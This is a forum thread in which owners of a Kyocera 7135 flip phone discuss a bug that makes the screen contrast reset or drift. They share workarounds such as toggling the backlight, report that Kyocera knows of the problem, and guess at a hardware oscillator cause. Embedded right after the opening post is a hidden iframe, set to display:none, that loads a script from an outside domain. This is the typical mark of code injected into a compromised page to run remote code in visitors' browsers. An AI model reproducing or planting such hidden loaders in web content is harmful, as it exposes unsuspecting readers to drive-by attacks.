+ Reply to Thread

Does Your Contrast Setting Have It's Own Mind Like Mine?

For some reason my GD Contrast keeps resetting itself to a default everytime (almost) I close and re-open the flip.

Anybody else experiencing this also?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: brightness and contrast

I've not had the default problem yet. But I do get variations in brightness and contrast all the time. I was trying to track when it happens and try to attribute it to maybe a weak battery state. It's almost like it keeps adjusting itself depending on the lighting conditions. Maybe it's supposed to like auto volume control.
    I have to keep the brightness all the way up. And when I view pics I have to adjust the contrast or they are to dark.
    I was going to bring this up in a thread but I don't know if it's a problem yet or just they way it was designed to work.

Re: Re: brightness and contrast

Originally posted by Expidia
    I've not had the default problem yet. But I do get variations in brightness and contrast all the time. I was trying to track when it happens and try to attribute it to maybe a weak battery state. It's almost like it keeps adjusting itself depending on the lighting conditions. Maybe it's supposed to like auto volume control.
    I have to keep the brightness all the way up. And when I view pics I have to adjust the contrast or they are to dark.
    I was going to bring this up in a thread but I don't know if it's a problem yet or just they way it was designed to work.
    I'll try some brightness/light situations with mine.

It's acting pretty wacky.

I think the great thing is how Kyocera would let us know these things (if that's the case...).

Contrast bug

It seems that if i set my contrast to the middle, or near it, the setting seems to have moved to the left (though the slider hasn't) when i close and reopen the flip (or make it sleep and wake up). If I set the slider to point at the middle of the "n" in "contrast" it happens less often. Does the work for anyone else?

Re: Contrast bug

Originally posted by KLiuLess
    It seems that if i set my contrast to the middle, or near it, the setting seems to have moved to the left (though the slider hasn't) when i close and reopen the flip (or make it sleep and wake up). If I set the slider to point at the middle of the "n" in "contrast" it happens less often. Does the work for anyone else?
    That's it! Makes two of us...

Try hitting the backlight button (off and on again) next time it happens. Seems to reset it.

Re: Re: Contrast bug

Originally posted by RUYORK
    That's it! Makes two of us...

Try hitting the backlight button (off and on again) next time it happens. Seems to reset it.
    Hmm. I have Alltel firmware. The off/on trick doesn't work for me; it stays at the brighter contrast.

This actually brings up another bug - when the Palm wakes up with the backlight key, the backlight shuts off (LCD still on). I have to wake it up using another hardware key.

I have the exact same problem KLiuLess. Closing or tapping the backlight key also fixes it for me. I have version .23/.36. Also, tapping the contrast or brightness control icons and adjusting either even slightly restores it to where it should be. It seems to be doing it less as of late.

Originally posted by Hoople
    I have the exact same problem KLiuLess. Closing or tapping the backlight key also fixes it for me. I have version .23/.36. Also, tapping the contrast or brightness control icons and adjusting either even slightly restores it to where it should be. It seems to be doing it less as of late.
    Same here. I'ts only happened about twice in the past few days...

Contrast

Past few days same thing happened with the contrast again. A few times when I opened the phone the contrast was way to light yet when I looked at the setting it had not moved. I move it to the right a bit and back and it's fine. I'm sure when Kyo does a firmware upgrade they will account for this bug. For those of us who have it happen we should all email their tech dept to make them aware of it. The same thing happened on my first unit that had a chip on the front. I was hoping it would be gone on this unit but it's still there.

Re: Contrast

Originally posted by Expidia
    Past few days same thing happened with the contrast again. A few times when I opened the phone the contrast was way to light yet when I looked at the setting it had not moved. I move it to the right a bit and back and it's fine. I'm sure when Kyo does a firmware upgrade they will account for this bug. For those of us who have it happen we should all email their tech dept to make them aware of it. The same thing happened on my first unit that had a chip on the front. I was hoping it would be gone on this unit but it's still there.
    This is definately an issue then...

Folks,

Kyocera has acknowledged this as a known problem and they did not have a fix the last time I talked to them.

Glenn

Yeah, my contrast is screwy MANY times each day.
    ~'kito
    pdaPhoneHome Moderator

jeh
    I have a sneaking suspicion that my meltdown (be sure to scroll down to see the picture there) was due to an extreme case of "contrast variation". If I try another of these phones it is going back the moment it shows the very first such "variation". I recommend that everyone else still in their trial periods take a similarly hard line. Kyocera should be told in no uncertain terms that a phone that can't even hold its most basic display settings from one "open" to the next is not repeat NOT ready to sell.

I think the humongous number of resets - both soft and hard - being reported are due to power glitches, probably from the same root cause.

Thx Glenn . . .

Thank you for letting us know about Kyo's awarness of this issue. It will save each of us the time it would have taken for many of us to notify them of the contrast issue. I would think they would include it in their next software upgrade. Hey, maybe they will let us trade them in for those slimmer 7145's.
    That's a nice thing about this forum . . . it's the feedback. I'm learning more shortcuts and how to's each day.
    Example: I never realized that there were brightness and contrast adjustments located on the top left and right sides of the silkscreens until I read that some people were inadvertently turning them on by using large graffiti strokes.
    Until I realized those shortcuts were there it was a pain adjusting for this quirky contrast bug. It makes it a little easier to deal with now until its fixed. I'll have to try the backlight button one to see if that works also.

jeh
    Wrong approach. I think they need EVERYONE with the "contrast issue" to return their phone for repair or replacement under warranty. The more of you decide "oh well, Kyo knows about it, I'll just live with it until there's a fix", the longer it will take to get fixed.

Note that it may well not be a software issue at all. A firmware rev can't fix hardware.

Originally posted by Markito
    Yeah, my contrast is screwy MANY times each day.
    Do you have to do anything besides open and close the 7135 again to correct it? (or push the backlight button on/off).

I don't know if anyone else has seen this, but I have found (with both of my 7135's) that they eventually got "trained" to remember the settings (with the occasional need to open/close to correct). Usually (for me) the contrast problem occured when I first received the 7135's, or after a hard reset (which I have only had to do for some "experiments" that require a hard reset). After a hard reset, or when they were brand new, for the first few hours the contrast problem was fairly frequent, but each time I saw it I adjusted it back to where it needed to be, and then within a couple hours it was back to normal... I generally only see them once every couple days now (and the open/close works every time).
    Please visit my picture site: Robert-O-Rama :)

jeh
    I don't think it's a matter of "training", as in software remembering settings. I think it's the oscillator for the LCD panel coming up in an unstable mode, maybe at 2x its normal frequency or some such. When you run the contrast control far enough to one side or the other it becomes unable to sustain that mode and reverts to normal mode... hence the sudden "jump" in the contrast back to the normal range.

The reason I think this is related to my meltdown is that when I was trying to get my phone to "come back" after the initial failure (before I noticed the burn damage, at which point I quit trying), it would come up with the contrast VERY washed out, far more washed out than I ever saw with the "normal" spontaneous changes. The Palm would go through its normal bootup and init screens and then try to turn on the phone, at which time it would say the battery was too low to run the phone.. .then the whole thing would power down. But the battery was fine. It just thought it was discharged because something was drawing so much current from it as to make smoke, inside the case at least. An oscillator stuck in a high-distortion mode could do exactly that.

In your case you were lucky, and as the components aged they did so in a direction that led to more stable behavior. Mine went the other way.

The above is of course conjecture, but it's reasonably well-informed conjecture.